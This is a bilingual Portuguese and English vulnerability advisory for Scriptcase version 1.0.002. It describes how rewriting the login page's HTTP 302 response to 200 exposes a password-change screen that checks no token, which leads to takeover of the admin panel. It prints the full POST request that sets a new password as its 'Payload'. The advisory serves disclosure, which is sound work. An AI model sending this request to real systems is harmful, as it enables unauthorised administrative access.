Título/Title: HTTP Response Manipulation leading to full account takeover
Tipo/Type: Broken Access Control
Owasp: A01-2021
Software/Versão/Version Vulnerável/Vulnerable: Script Case Version: 1.0.002 – Build 7 – Running on Windows Server 2019
Versão Corrigida/Fixed Version: N/A
Autor/Author: Leonardo Benatto e Samuel Giroldo Lima
CVE – N/A
VIDEO: https://youtu.be/30bQP88ploA
URL: https:// IP:8092/scriptcase/prod/lib/php/devel/iface/login.php
Foi descoberta uma forma de resetar a senha do ambiente de produção, sem a necessidade de validar o e-mail ou saber a senha previamente.
Essa vulnerabilidade consiste em interceptar a requisição da página de login do ambiente de produção e forçar a resposta de HTTP/302 para HTTP/200, exibindo assim a tela contendo informações para troca/recuperação de senha.
Confirmamos que essa tela não possui nenhum sistema de validação de token ou autenticidade da requisição, sendo facilmente alterada e permitindo acesso ao painel de administração da ferramenta.
A way has been discovered to reset the production environment password without the need to validate the email or know the password beforehand.
This vulnerability consists of intercepting the request for the login production environment page and forcing the response from HTTP/302 to HTTP/200, thus displaying the screen containing information for changing/reset the password.
We confirmed that this screen does not have any token validation system or the authenticity of the request, and is easily changed and allows access to the tool’s administration panel.
Payload:
POST /scriptcase/prod/lib/php/devel/iface/login.php HTTP/1.1
Host: IP:8092
Content-Length: 118
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:8092
Referer: http://192.168.100.163:8092/scriptcase/prod/lib/php/devel/iface/login.php?rand=a35a0d78d62a01
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=oh6pfmn198puvikv64hm91ni56; sales1.scriptcase-_zldp=%2Blf8JBkbzCQR1XJIvHDapdREcwzHVAx1Ak1yo%2B%2B12MHvy8myWMeVPxDkMUYHQXCt61H4KQEA5qU%3D; sales1.scriptcase-_zldt=926de0b1-a19b-4e89-81b6-ca6fe8502c37-0
Connection: close
ajax=nm&nm_action=change_pass&email=test%40test.com&pass_new=Teste123456&pass_conf=Teste123456&lang=pt-br&captcha=PSHE